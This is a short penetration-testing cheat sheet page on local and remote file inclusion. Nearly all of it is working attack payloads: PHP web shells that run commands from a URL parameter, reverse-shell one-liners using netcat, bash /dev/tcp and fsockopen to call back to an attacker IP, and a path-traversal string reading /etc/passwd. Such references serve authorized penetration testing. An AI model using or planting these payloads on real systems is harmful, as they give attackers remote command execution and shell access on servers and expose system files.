LFI/RFI
Pentestmonkeys /usr/share/webshells/php/php-reverse-shell.php
<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>
<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>
Reverse TCP shell without netcat
<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>
<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>
../../../../../../../../../etc/passwd
Notes
Some versions of netcat does not support
-e
flag
References
Last updated
Was this helpful?